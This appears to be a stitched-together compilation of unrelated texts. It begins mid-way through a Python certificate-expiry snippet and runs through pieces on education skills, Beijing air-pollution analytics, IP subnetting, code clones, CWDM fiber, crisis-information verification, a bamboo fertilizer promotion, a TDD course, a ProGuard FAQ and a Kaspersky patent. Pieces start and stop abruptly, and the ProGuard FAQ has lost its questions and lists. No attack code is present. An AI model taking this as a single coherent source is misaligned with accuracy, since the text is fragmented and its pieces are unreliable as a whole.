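            cert = tls.getpeercert()
    expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]),
                                     tz=timezone.utc)
    return (expires - datetime.now(timezone.utc)).days

print(cert_days_remaining("example.com"), "days remaining")  # placeholder host
```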
21st century skills have been a hot topic in the world of education, and there is an overwhelming amount of 21st century skill information on the web. However, it’s not easy for every education professional to absorb what it means to them and their district. - The world is more connected, flatter, and moving faster. Technology evolution, a maturing world economy, dynamic teaming and collaboration. Windows of opportunity are getting smaller as news flows faster. Reaction time is a critical differentiator. - Information is growing rapidly – and all can contribute. Information is exploding – but some is accurate, some is not, some are opinions, some are lies, some are personal expressions. Information in the new world is not static – it is interactive and dynamic. So based on these changes, what are the new and growing skills required in the 21st century? For the benefit of my own school district – and anyone trying to get their arms around the fundamentals – I’ve narrowed the list to seven key skills: - Information Literacy: Navigating, interpreting and effectively using the explosion of information available to us is critical in the 21st century. - Media Literacy: IM streams, blogs, streaming video, web conferences – information is being channeled through ever-changing media. The ability to navigate and interpret those media in context, as well as the ability to use those media effectively to communicate are critical skills. - Information Technology Literacy: The tools that we use to create or access media that contain information are constantly evolving. Understanding exactly which tools to use, and when, in a constantly evolving tools environment is a critical skill. - Global Literacy: The world is more connected, and insularity is not an option. Awareness, social and cross-cultural skills are valuable. - Flexibility & Adaptability: The world has always been changing, but change happens – and is communicated – faster. Agility is critical in the 21st century. - High-Level Knowledge Skills: In a flat world, lower-level skills are a commodity. Critical thinking, problem-solving, creativity and innovation are valuable. - Communication & Collaboration: A connected world requires better communication skills, and the ability to dynamically team to accomplish tasks. Want to dive deeper? I’d recommend the Partnership for 21st Century Skills. And my colleague Daryl Plummer’s post on 20th century thinking. And, of course, my own thoughts on the impact of the web, social software and cloud computing on education. Good luck, and I’d love comments! Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.
Analytics Tools Help China Deal With Air PollutionBy Samuel Greengard | Posted 2014-08-15 Email Print The Chinese government is taking steps to deal effectively with the country's growing air pollution problem by deploying advanced analytics and other tech tools. As China has grown into a global economic powerhouse, air pollution has become a major health problem. Smog in major urban areas such as Beijing has worsened in recent years, and it now reaches hazardous levels on a regular basis. As a result, Prime Minister Li Keqiang declared war on pollution last March, and the country has announced that it will work with regional and local officials that do not address the issue adequately. Yet, China is turning to more than political discourse and new policies to address its air pollution problem. In July, the Chinese government inked a 10-year deal with IBM to embark on an initiative dubbed "Green Horizon." Its goal is to boost renewable energy and improve energy optimization, while putting systems and data to work in order to better understand the underlying sources of pollution and the steps required to address the challenge. The need to clear the air is apparent to a wide range of observers, including researchers. "China's rapid economic development has introduced heavy environmental costs," states Tao Wang, resident scholar in the Energy and Climate Program at Carnegie-Tsinghua Center for Global Policy. "As the general public demands a better environment and improved quality of life, it is important for the government to respond and adopt a more sustainable approach to economic development." IBM's China Research Laboratory will spearhead the effort and tap into a network of 12 global research labs to create an ecosystem of partners from across government, academia, industry and private enterprise. Green Horizon will rely on advanced technologies and computing methods—including weather satellites, next-generation optical sensors, structured databases, big data analytics and the Internet of things—to gain deeper insights into weather prediction and climate modeling. Cognitive computing systems will analyze and learn from streams of real-time data. By applying supercomputing processing power, scientists from IBM and the Beijing government hope to generate visual maps at street-scale resolution showing the source and dispersion of pollutants across Beijing 72 hours in advance. "This project will provide Beijing with a much better understanding of how pollution is produced and spread across the city, so the government can address it more effectively," Wang explains. In addition to monitoring real-time data, scientists and researchers will use historical data to better "calibrate" the model, he adds. What's more, the IBM technology will overlay with the country's Airborne Pollution Prevention and Control Action Plan, which aims to safeguard the health of approximately 700 million people living in urban areas. The city of Beijing will invest more than $160 billion to improve air quality and deliver on its target of reducing harmful fine Particulate Matter (PM 2.5) by 25 percent by 2017. With accurate, real-time data about Beijing's air quality, the government will be in a position to address environmental issues rapidly by altering production at specific factories or alerting citizens about developing air quality issues. 
In addition, the Chinese government has established a goal of obtaining 13 percent of its consumable energy from non-fossil fuels by 2017, while enabling the construction of the world's largest renewable grid. "Science-based decision support systems combined with sophisticated data analysis are exactly what the Chinese government needs to address the country's energy and environmental issues," Wang concludes.
Binary and IP Address Basics of Subnetting
The process of learning how to subnet IP addresses begins with understanding binary numbers and decimal conversions, along with the basic structure of IPv4 addresses. The process of subnetting is both a mathematical process and a network design process. Mathematics drives how subnets are calculated, identified, and assigned. The network design determines how many subnets are needed and how many hosts an individual subnet needs to support, based on the requirements of the organization. This paper focuses on the mathematics of binary numbering and IP address structure. It covers the following topics:
1. Construct and representation of an IPv4 address.
2. Binary numbering system.
3. Process to convert a decimal number to a binary number.
4. Process to convert a binary number to a decimal number.
5. Fundamental aspects of an IPv4 address.
Note: Throughout this document, the term IP address refers to an IPv4 address. This document does not cover IPv6.
IP Address Construct and Representation
An IP address is a thirty-two-bit binary number. The thirty-two bits are separated into four groups of eight bits called octets. However, an IP address is written as a dotted decimal number (for example: 192.168.10.1). Since an IP address is a binary number represented in dotted decimal format, an examination of the binary numbering system is needed.
The Binary Numbering System
Numbering systems have a base, which indicates how many unique digits they have. Humans use the decimal numbering system, which is a base ten system: there are only ten base numbers, zero through nine, and all other numbers are created from these ten. The position of a digit determines its value. For example, the number 2,534 means the following: two thousands, five hundreds, three tens, and four ones; each position is worth ten times the position to its right. Computers, routers, and switches use the binary numbering system. The binary numbering system is a base two system, meaning there are only two base numbers, zero and one, and all other numbers are created from these two. Just as in the decimal numbering system, the position of a digit determines its value. The first eight binary positions, from 2^7 down to 2^0, have the place values 128, 64, 32, 16, 8, 4, 2, and 1. For exponents above 7, double the previous place value: 2^8 = 256, 2^9 = 512, 2^10 = 1,024, and so on.
Decimal to Binary Conversion
Since IP addresses are binary numbers represented in dotted decimal format, it is often necessary to convert a decimal number to a binary number. As an example, the decimal number 35 converts to the binary number 00100011. The steps to perform this conversion are below.
1. Determine your decimal number. In this scenario, it is 35.
2. Write out the base number and its exponent. Since an IP address uses groups of eight binary bits, eight base two exponents are listed (2^7 through 2^0).
3. Below the base number and its exponent, write the place value. For example, 2^0 has a value of 1, 2^2 has a value of 4, 2^3 has a value of 8, and so on.
4. Compare the value of the decimal number to the value of the highest bit position. If the value of the highest bit position is greater than the decimal number, place a 0 below the bit position. A 0 below the bit position means that position is not used.
However, if the value of the highest bit position is less than or equal to the decimal number, place a 1 below the bit position. A 1 below the bit position means that position is used.
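To check the hand method, here is a short Python sketch (my own illustration, not part of the paper) that applies the same place-value walk to each octet of an address:

```python
def octet_to_binary(value):
    """Walk the place values 128..1, writing a 1 wherever the value still fits,
    exactly as in the manual steps above."""
    bits, remaining = "", value
    for place in (128, 64, 32, 16, 8, 4, 2, 1):
        if place <= remaining:
            bits += "1"
            remaining -= place
        else:
            bits += "0"
    return bits

def ip_to_binary(address):
    return ".".join(octet_to_binary(int(octet)) for octet in address.split("."))

print(octet_to_binary(35))            # 00100011
print(ip_to_binary("192.168.10.1"))   # 11000000.10101000.00001010.00000001
```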
The "Dollies" of Software Cloning is an easy, fast way to duplicate business functionality. However, it's also been a key factor behind the uncontrolled growth of our industrial-strength systems. Since 1965, total source code developed and maintained has risen from 3 billion lines to at least 500 billion lines. And it's estimated that clones today represent about 10% of code in many large systems. What's more, cloning is creating unmanageable complexity; especially through the dissemination of dangerous, hard-to-fix errors. Growing size and complexity, in turn, is making these legacy systems more difficult and expensive to support. As a system's size (measured in total lines of code) increases, so does the number of professionals needed to maintain it. The average software professional already manages about 100,000 lines of code, and the burden of managing clones will only add to the workload. This spells big potential costs and productivity issues over the long term. After all, software maintenance represents more than 80% of total cost of ownership (TCO) during the life of a system, and the supply of software professionals is limited. For a worst-case cloning scenario, consider a massive transportation-industry system that crashed in 2004. After analyzing the system, I discovered that one reason for the failure was overwhelming software complexity that had developed over decades. The system contained more than 4,000 programs and 1.24 million lines of code, with perhaps 100,000 of them cloned. This was the perfect setup for further outtages and business disruptions. The lesson? We must simplify such systems now. Detecting, analyzing and removing the clones are the essential first steps. Together, these steps set the stage for success with subsequent legacy modernization activities as we continue progressing through this "modernization decade." Automatic clone detection techniques are especially valuable since they maximize cost savings and programmer productivity over the software maintenance life cycle. Here are five automatic clone detection techniques commonly used today: Using the text-based method on a 40,000-line COBOL system, researchers found 25% of the lines of code were cloned. The abstract syntax tree method revealed 12.7% cloned lines in a 400,000-line C-language system. The potential in that case -- 50,000 fewer lines to maintain, along with the substantial long-term cost savings -- is intriguing, indeed. Analyzing and Removing But automatically detecting clones is only the crucial first step in legacy system modernization. We must then analyze the clones by visualizing where they occur across the system in question. Graphical tools such as ones that display "clone pairs" as diagonal lines on a grid are useful here. Removing clones is the ultimate goal, of course. The process of removing code, which does not alter program functionality, is called generalizing, refactoring or restructuring. Today's agile development methodologies include two approaches for removing clones. The extract method extracts a fragment of code from multiple instances and redefines it as a new method or function. In the pull-up method, child methods are pulled up to a parent method. These approaches are primarily manual. But a tool called Cancer (part of the CCFinder toolset developed by Toshihiro Kamiya) shows promising results in automating them. Fully automated clone removal will prove to be a great time-saver for our software maintenance organizations. 
It's time to take the first steps to successful legacy modernization. Clone detection, analysis and removal will significantly reduce the costs and complexity of our large, aging, business-critical systems. Tom Hill, who became an EDS Fellow in 1991, is head of EDS' research and development (R&D) for the second time in his 30-year EDS career.
This method combines at least two signals at different wavelengths for transmission along one fiber-optic cable. CWDM uses fewer channels than DWDM, but more than standard WDM. In 2002, a 20-nm channel spacing grid was standardized by ITU (ITU-T G.694.2) ranging from 1270 to 1610 nm. However, since wideband optical amplification is not available, this limits the optical spans to several tens of kilometers. CWDM is a cost-effective option for increasing mobile backhaul bandwidth, but it does come with some network characterization and deployment challenges, including a limited maximum distance. However, a major advantage is that it can be easily overlaid on existing infrastructure. The most basic configuration is based on a single fiber pair, where one fiber is used to transmit and the other to receive. This configuration often delivers eight wavelengths from 1471 nm to 1611 nm. However, networks are now deploying in the O-band, which doubles the capacity to 16 wavelengths (1271 nm to 1451 nm), excluding the 1371 nm and 1391 nm water peak wavelengths. CWDM architecture is only comprised of passive components, namely multiplexers and demultiplexers; no amplifiers are used. This means there is no amplification, and therefore, no noise. The main advantage of this is that there is no need to measure the optical signal-to-noise ratio. Upon activation, barring improper fiber characterization, only the following elements can prevent proper transmission: - Transmitter failure - Sudden change in the loss created in an OADM - Human error (e.g., connection to the wrong port or splicing to the wrong filter port) Links can be tested end-to-end and fully characterized with a specialized CWDM OTDR. Thanks to its CWDM-tuned wavelengths, this tool will drop each test wavelength at the corresponding point on the network (e.g., customer premises, cell tower, etc. This means that each part of the network can be characterized at the head-end, which will save time and avoid travelling to hard-to-get-to sites. Once the wavelength is active, a channel analyzer must be used at the customer premises or cell tower to validate that it is present and that the power level received is within budget. This OTDR and channel analyzer combo is also useful when a single customer is experiencing issues. If the channel analyzer cannot confirm that the channel is present and within power budget, the CWDM OTDR can be used to test at either a specific or out-of-band wavelength to detect issues. The advantage of using an out-of-band wavelength (1650 nm) is that the OADM will filter it out.
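As a quick cross-check of the channel counts quoted above, the 20 nm grid and the water-peak exclusions can be enumerated in a few lines (a simple illustration; the wavelengths follow the channel ranges given in this article):

```python
# 20 nm CWDM grid spanning the channel ranges cited above (1271-1611 nm centers).
full_grid = list(range(1271, 1612, 20))

upper_band = [wl for wl in full_grid if wl >= 1471]                          # classic 8 channels
o_band = [wl for wl in full_grid if wl <= 1451 and wl not in (1371, 1391)]  # skip water peaks

print(len(upper_band), upper_band)                               # 8 channels, 1471..1611 nm
print(len(o_band), o_band)                                       # 8 channels, 1271..1451 nm
print("total usable channels:", len(upper_band) + len(o_band))   # 16
```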
This article is the fourth installment in Orlando's series on virtual operations support teams (VOSTs). The first installment, Lessons Learned From The Social Media Tabletop Exercise, is available here. The second installment, Structured Networks & Self-Coordinated Disaster Response, is available here. The third installment, Harnessing The Wisdom Of Crowds, is available here.

Crisis Information From Social Media

In recent months, a lot of coverage has been dedicated to instances of misinformation on social media during a crisis. In particular, Shashank Tripathi, the campaign manager for a State Senatorial candidate in New York, Tweeted politically motivated misinformation about Hurricane Sandy. His candidate got creamed in the election, by the way. These reports might lead some to think that social media should not be used to gather information during a crisis, but this would be a mistake for a number of reasons:

- No source is infallible. Mass media outlets routinely get it wrong. Tripathi's false claims were immediately questioned on Twitter, but were spread by the mass media. Similarly, mass media spread a number of false reports during the Sandy Hook incident, and even official reports routinely get information wrong.

- No information is also bad. As Patrick Meier put it, "False information can cost lives. But no information can also cost lives, especially in a crisis zone. Indeed, information is perishable so the potential value of information must be weighed against the urgency of the situation. Correct information that arrives too late is useless."

- Social media can correct false information from other sources: Jeanette Sutton demonstrated that crises breed a network of fact-checkers who crop up around the world and patrol social networks to correct misinformation provided by social media, the mass media and official reports. In one case they corrected misinformation about the Tennessee Coal Pond disaster that was provided by official sources, leading those sources to retract the claims.

- Social media tends to self-correct: Study after study, including one carried out by the Defense Advanced Research Projects Agency, demonstrates that social networks of all varieties tend to self-correct for misinformation. As one commentator put it: "A redeeming feature of Twitter is the relative speed with which its users manage to sniff out and debunk the most widely circulated falsehoods. On Friday, for instance, word that the media had fingered the wrong suspect was circulating on Twitter while TV networks were still running with the false reports. The New Yorker's Sasha Frere-Jones has called the site a 'self-cleaning oven.' In Sandy's wake, Buzzfeed's John Hermann declared it a 'truth machine.'" While cynics assume that social media must amplify false reports, research proves the opposite. A study of over 4,700,000 tweets related to the earthquake in Chile found that: "About 95% of tweets related to confirmed reports validated that information. In contrast only 0.03% of tweets denied the validity of these true cases… [Meanwhile], about 50% of tweets will deny the validity of false reports." Most people are not trying to mislead during a disaster, and the vast majority of good intentions will drown out the small number of bad intentions.

- Social media provides more information: Both official and mass media accounts by necessity summarize information, causing the loss of valuable detail.
If you live near a wildfire, you are less interested in the total number of acres burned than where the fire is in relation to your street. That's why crowdmapping has become such a valuable tool for disaster response -- it preserves the millions of details about the contours of the situation that are critical to decision-making.

- We are already doing it: Patrick Meier points out that emergency responders already crowdsource information through 911. Responders do not even worry about verifying the information from a 911 call before responding; they just go. Social media analytics is 911 writ large, with the added ability to gather much more information and do verification on that information, as we will see below.

While a number of commentators have focused on the question of how to verify information from social media, the considerations above show that the question is also "How to use social media to verify information from all sources -- social media, mass media, official, etc.?" Imagine that you are a fire chief with 20 firefighters positioned along a ridge fighting a wildfire. One official source reports that they are not in harm's way, but suddenly you are flooded with hundreds of independent reports from citizens claiming to see that the fire has circled around and threatens to engulf your firefighters. What would you do?

In fact, the real question is "How to gather, authenticate, and integrate information from a variety of sources -- citizen, mass media, official, etc. -- to develop situational awareness?" This is the major new task of disaster managers, and the virtual operations support team (VOST) has arisen to do just that. We will learn how to set up and run a VOST in the pre-conference workshop at the 11th Annual Continuity Insights Management Conference in April, 2013. See http://www.cimanagementconference.com/pre-post-conference-workshops for more information.

More importantly, we will learn how to gather and authenticate information from a variety of sources during an incident. A host of research is emerging on how to authenticate information from different sources during a disaster, and we will apply these findings to a real crisis that is occurring somewhere in the world during the workshop. Participants will practice gathering information from a variety of sources, applying verification criteria, categorizing and aggregating the information, and then evaluating it to form a picture of the situation. This will not only provide participants with experience using the tools, but also experience in verification techniques that they can apply to their own crisis management.

Verification techniques fall into two categories: reliability of the source and outside confirmation. Within them are principles developed from a variety of studies and real-life applications. For instance, the Standby Taskforce is a 700-person group of volunteers from around the world who assist the United Nations in responding to events by gathering, organizing and verifying information from a variety of sources, including social media. They have developed fairly sophisticated principles and procedures for judging the credibility of information. We will use many of these principles in our own mock VOST. These principles include:

- Location of the source: Eyewitness or far away? Is it a retweet or original?

- Type of source: Journalist, ordinary citizen, diplomat, etc.?

- Language used: URLs provided, positive vs. negative language, profanity, adjectives, grammar, etc.
- Quantity of information on the source: The Standby Taskforce asks questions such as "Does the source provide a name, picture, bio and any links to their own blog, identity, profession … does searching for this name on Google provide clues to the person's identity? Perhaps a Facebook page, a professional email address, a LinkedIn profile?"

- Followers: How many followers does the source have? Are the followers in the affected area, indicating a relation to the scene (and thus care for those who are reading the information, making it more likely to be genuine)? How many people does the source follow? What type of people are they?

- Timing of the information: Is the information in real-time or delayed, and is the timing suspicious?

- Provides visual evidence: Is there a photo or video accompanying the report that can be evaluated?

Outside confirmation includes:

- Number of independent reports: As I discussed in an earlier article, the independence of reports is critical to creating "the wisdom of crowds." Many eyes independently reporting on a situation have been proven to create a highly accurate collective picture of the event. Mob mentality is created when only a few voices are heard and influence the opinions of others sequentially. Independence is a major criterion for validation.

- Coherence with reports from the same area: Are other reports from the same area consistent with it?

- Can others verify? One simple crowdsourcing tool is to feed a report back into the system and ask if others can produce similar reports.

A world of resources is now available to the emergency manager for gathering information about a crisis and creating a picture of unfolding events. These resources can be overwhelming to the business continuity or disaster manager, but using them simply requires training and practice. Please join us to learn how they can be applied within your organization.

"Beyond Sandy Hook. Why it's OK for the media to be wrong (for a while)," Chris Seper, http://www.linkedin.com/today/post/article/20121217061430-107961-beyond-sandy-hook-why-it-s-ok-for-the-media-to-be-wrong-for-awhile

"Information Forensics: Five Case Studies on How to Verify Crowdsourced Information from Social Media," Patrick Meier, iRevolution, http://irevolution.net/2011/11/29/information-forensics-five-case-studies/

"Twittering Tennessee: Distributed Networks and Collaboration Following a Technological Disaster," Jeanette Sutton, http://www.jeannettesutton.com

DARPA Network Challenge Project Report, http://www.hsdl.org/?view&did=17522

"Building a Better Truth Machine," Will Oremus, Slate, December 14, 2012, http://www.slate.com/articles/technology/future_tense/2012/12/social_media_hoaxes_could_machine_learning_debunk_false_twitter_rumors_before.html

"Analyzing the Veracity of Tweets during a Major Crisis," Patrick Meier, iRevolution, September 19, 2010, http://irevolution.net/2010/09/19/veracity-of-tweets-during-a-major-crisis

The sampling of principles is drawn from a variety of sources, especially "Verifying Crowdsourced Social Media Reports for Live Crisis Mapping: An Introduction to Information Forensics," Patrick Meier, iRevolution, http://irevolution.net/2011/11/29/information-forensics-five-case-studies. The quote above is also from that work.
WEST PALM BEACH, FL--(Marketwired - Sep 2, 2014) - Bamboo is not only one of the fastest growing plants on the planet (some species can grow four feet within only 24 hours); its popularity in backyards and on farms across the United States is growing just as quickly.

Reasons for growing bamboo abound: Farmers use it around their fields to reduce erosion and protect fields from wind. And for hobby gardeners this evergreen perennial is an attractive alternative to hedges, providing a screen that not only blocks curious eyes, but also catches dust and other small particles. On top of that, bamboo is a perfect solution for going green: One grove of bamboo releases 35% more oxygen than a comparable stand of trees and is thus a crucial element in keeping the balance of oxygen and carbon dioxide in the atmosphere.

While bamboo has played a significant economic and cultural role in Asia for centuries, American growers are still learning and perfecting their growth methods for this versatile plant. Steven Blackburn, Business Development Manager in North America at Vegalab, a manufacturer of environmentally responsible and sustainable agricultural products, started his own 19-acre bamboo farm in Labelle, Florida, to learn about farming and find out whether it was possible to successfully grow this oriental plant in a Western country like the United States. It turns out it is possible. Keeping just a few rules and tricks in mind, bamboo can even thrive in a tiny backyard.

Selecting the right bamboo species for the respective climate is crucial, Blackburn explains. A great bamboo for colder climates is the Yellow Groove, he advises, which will grow in Zone 5 climates and warmer. Using mulch will help to hold the water, preventing it from evaporating in warmer regions and protecting the roots in colder areas. Last but not least, using the right fertilizer will trigger bamboo to grow at a speed that no tree or hedge can compete with.

Naturally, Steven Blackburn was curious to try out Vegalab's fertilizing products on his farm and was thrilled about the difference in growth he could witness as a result. According to Blackburn's experience, it is best to fertilize bamboo twice a year: ideally in early spring, to encourage new growth, and a second time during the growing season, to replace nutrients that may be getting depleted. Crucial compounds that a fertilizer used on bamboo should contain are nitrogen, phosphorus and potassium. Other factors that play a role are the absorption rate and the pH balance in the soil. Vegalab offers a wide variety of all-natural fertilizers for different climates and species along with expert advice from Blackburn and his team to make sure customers select the appropriate product for their respective purpose and environment.

Steven Blackburn is a successful entrepreneur and expert in the fields of organic fertilizers, pesticides and agriculture. In his role as Development Manager for Vegalab, he puts special focus on supporting sustainable farming and developing environmentally friendly products and does not shy away from getting his hands in the dirt to try products out himself. Blackburn's motivation is not higher sales numbers, but creating all-natural products that foster a healthier world and contribute to a sustainable future. With Vegalab he found a company that follows the same goals and principles, resulting in an extremely fruitful cooperation from which farmers and gardeners across the U.S. and all around the world can now benefit.
Steven Blackburn Blog: http://www.StevenBlackburnVegalab.com
Test Driven Development

Learn to implement test-driven development (TDD) methods by incorporating unit testing, design, refactoring, and frameworks into your workflow.

Test-Driven Development (TDD) is a design engineering process that relies on a very short development cycle. A TDD approach to software development requires a thorough review of the requirements or design before any functional code is written. The development process starts with writing a test case, then writing just enough code to pass the test, and then refactoring until completion.

Benefits of a TDD approach to software engineering include:

- Faster feedback
- Higher acceptance
- Avoids scope creep and over-engineering
- Customer-centric and iterative
- Leads to modular, flexible, maintainable code

This three-day course is a deep dive into TDD that incorporates the steps that are necessary for effective implementation. You will cover unit tests, user stories, design, refactoring, frameworks, and how to apply them to existing solutions. In addition, this course explores the implications of code dependencies, fluid requirements, and early detection of issues.

This is an interactive class with hands-on labs. To get the most out of this course, you are encouraged to fully participate. This course demonstrates the skills developers and teams need for building quality applications sustainably for the life of the code base.

Note: A PC or Mac is required for this class to access remote labs.
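To make the write-a-failing-test-first rhythm concrete, here is a minimal, generic sketch in Python; it is an illustration only, not course material, and the function and test names are invented:

    # Step 1 (red): write a test for behavior that doesn't exist yet.
    import unittest

    def apply_discount(price, percent):
        # Step 2 (green): the simplest implementation that makes the tests pass.
        if not 0 <= percent <= 100:
            raise ValueError("percent must be between 0 and 100")
        return round(price * (1 - percent / 100), 2)

    class ApplyDiscountTest(unittest.TestCase):
        def test_ten_percent_off(self):
            self.assertEqual(apply_discount(200.0, 10), 180.0)

        def test_rejects_invalid_percent(self):
            with self.assertRaises(ValueError):
                apply_discount(100.0, 150)

    if __name__ == "__main__":
        # Step 3 (refactor): with the tests green, the implementation can be cleaned up safely.
        unittest.main()

The same cycle repeats for each new requirement: a failing test, the minimal passing code, then refactoring under the protection of the existing tests.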
Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces.

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces.

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing you to retarget older class files at Java 6.

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can:

The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller.

Some notable optimizations that aren't supported yet:

Yes, you can. ProGuard itself is distributed under the GPL, but this doesn't affect the programs that you process. Your code remains yours, and its license can remain the same.

Yes, ProGuard supports all JDKs from 1.1 up to and including 8.0. Java 2 introduced some small differences in the class file format. Java 5 added attributes for generics and for annotations. Java 6 introduced optional preverification attributes. Java 7 made preverification obligatory and introduced support for dynamic languages. Java 8 added more attributes and default methods. ProGuard handles all versions correctly.

Yes. ProGuard itself runs in Java Standard Edition, but you can freely specify the run-time environment at which your programs are targeted, including Java Micro Edition. ProGuard then also performs the required preverification, producing more compact results than the traditional external preverifier. ProGuard also comes with an obfuscator plug-in for the JME Wireless Toolkit.
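To give a feel for how the shrinking and obfuscation steps described above are typically driven, here is a small, hypothetical ProGuard configuration; the jar and class names are made up, and the ProGuard manual remains the authoritative reference for the option list:

    # Hypothetical minimal ProGuard configuration for a small application.
    -injars  myapp.jar
    -outjars myapp-processed.jar
    -libraryjars <java.home>/lib/rt.jar

    # Keep the entry point so shrinking doesn't remove it.
    -keep public class com.example.Main {
        public static void main(java.lang.String[]);
    }

    # Write out the obfuscation mapping so stack traces can later be
    # de-obfuscated with ReTrace.
    -printmapping mapping.txt

Everything not reachable from the kept entry point is removed, and the remaining names are obfuscated according to the mapping written to mapping.txt.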
The dx compiler converts Java bytecode into the Dalvik bytecode that runs on Android devices. By preprocessing the original bytecode, ProGuard can significantly reduce the file sizes and boost the run-time performance of the code. It is distributed as part of the Android SDK. DexGuard, ProGuard's closed-source sibling for Android, offers additional optimizations and more application protection.

It should. RIM's proprietary rapc compiler converts ordinary JME jar files into cod files that run on Blackberry devices. The compiler performs quite a few optimizations, but preprocessing the jar files with ProGuard can generally still reduce the final code size by a few percent. However, the rapc compiler also seems to contain some bugs. It sometimes fails on obfuscated code that is valid and accepted by other JME tools and VMs. Your mileage may therefore vary.

Yes. ProGuard provides an Ant task, so that it integrates seamlessly into your Ant build process. You can still use configurations in ProGuard's own readable format. Alternatively, if you prefer XML, you can specify the equivalent XML configuration.

Yes. ProGuard also provides a Gradle task, so that it integrates into your Gradle build process. You can specify configurations in ProGuard's own format or embedded in the Groovy configuration. ProGuard's jar files are also distributed as artefacts from the Maven Central repository. There are some third-party plugins that support ProGuard, such as the android-maven-plugin and the IDFC Maven ProGuard Plug-in. DexGuard also comes with a Maven plugin.

Yes. First of all, ProGuard is perfectly usable as a command-line tool that can easily be integrated into any automatic build process. For casual users, there's also a graphical user interface that simplifies creating, loading, editing, executing, and saving ProGuard configurations.

Yes. ProGuard automatically handles constructs like Class.forName("SomeClass") and SomeClass.class. The referenced classes are preserved in the shrinking phase, and the string arguments are properly replaced in the obfuscation phase. With variable string arguments, it's generally not possible to determine their possible values. They might be read from a configuration file, for instance. However, ProGuard will note a number of constructs like "(SomeClass)Class.forName(variable).newInstance()". These might be an indication that the class or interface SomeClass and/or its implementations may need to be preserved. The developer can adapt his configuration accordingly.

Yes. ProGuard copies all non-class resource files, optionally adapting their names and their contents to the obfuscation that has been applied.

No. String encryption in program code has to be perfectly reversible by definition, so it only improves the obfuscation level. It increases the footprint of the code. However, by popular demand, ProGuard's closed-source sibling for Android, DexGuard, does provide string encryption, along with more protection techniques against static and dynamic analysis.

Not explicitly. Control flow obfuscation injects additional branches into the bytecode, in an attempt to fool decompilers. ProGuard does not do this, except to some extent in its optimization techniques. ProGuard's closed-source sibling for Android, DexGuard, does offer control flow obfuscation, as one of the many additional techniques to harden Android apps.

Yes. This feature allows you to specify a previous obfuscation mapping file in a new obfuscation step, in order to produce add-ons or patches for obfuscated code.
Yes. You can specify your own obfuscation dictionary, such as a list of reserved key words, identifiers with foreign characters, random source files, or a text by Shakespeare. Note that this hardly improves the obfuscation. Decent decompilers can automatically replace reserved keywords, and the effect can be undone fairly easily, by obfuscating again with simpler names.

Yes. ProGuard comes with a companion tool, ReTrace, that can 'de-obfuscate' stack traces produced by obfuscated applications. The reconstruction is based on the mapping file that ProGuard can write out. If line numbers have been obfuscated away, a list of alternative method names is presented for each obfuscated method name that has an ambiguous reverse mapping. Please refer to the ProGuard User Manual for more details. Erik André at Badoo has written a tool to de-obfuscate HPROF memory dumps.

DexGuard is a commercial extension of ProGuard.
Kaspersky Lab, a leading developer of secure content management solutions, announces the successful patenting of cutting-edge IT security technology in the US. The technology enables detection and removal of all malicious programs, including those that were previously unknown, installed on a user's computer after a single virus incident.

Today's malware makes extensive use of Trojans to penetrate users' machines. Once downloaded and installed on a system, a Trojan downloads numerous other malicious programs from the Internet. As a result, dozens of various malicious codes and their components can end up on a user's PC. Some of them may be new malicious programs with signatures that have yet to be added to antivirus databases or that make use of unknown technology for evading detection. Malware like this can go undetected by antivirus solutions for some time, carrying out harmful or destructive operations on an infected computer.

This flaw in antivirus protection makes the task of detecting and removing all malicious programs and their components downloaded and installed on a user's computer as a result of a single virus incident, including previously unknown malware, all the more important. This defect can now be solved using the latest Kaspersky Lab technology developed by Mikhail Pavlyushchik. The technology was granted Patent No. 7472420 by the US Patent and Trademark Office on 30 December, 2008. The patent outlines the method used to detect and remove all malicious programs installed on a user's computer as a result of a single virus incident as well as locating the source and time of the incident.

The new technology is based on the logging of system events which indicate the possibility of a virus infection (for example, modification of an executable file and/or a record in the system registry) and then determining the extent of a virus incident based on the records made. According to the patented technology, when a malicious process or file is detected, a module that analyses preceding events is launched that allows the source and the time of an infection to be determined. The system then analyzes all child events related to the source event, which makes it possible to detect all malicious programs involved in the incident, including those that were previously unknown. In addition to detecting malware, the new technology removes or quarantines malicious code, interrupts malicious processes, and restores the system files from a trusted backup.

Information about malicious programs detected with the help of the patented method can be immediately sent to antivirus vendors in order to speed up their response times to new threats. Determining the source and context of an infection is helpful in preventing similar virus incidents in the future, for example, in detecting and blocking infected sites, detecting and eliminating software vulnerabilities, etc. Furthermore, reconstructing the full picture of an incident and documenting it could provide the basis for building a successful criminal case against the cybercriminals responsible.

Kaspersky Lab currently has more than 30 patent applications pending in the US and Russia. These relate to a range of technologies developed by company personnel. Additionally, many of today's antivirus technologies were developed by Kaspersky Lab and are currently used under license by vendors worldwide, including Microsoft, Bluecoat, Juniper Networks, Clearswift, Borderware, Checkpoint, Sonicwall, Websense, LanDesk, Alt-N, ZyXEL, ASUS and D-Link.
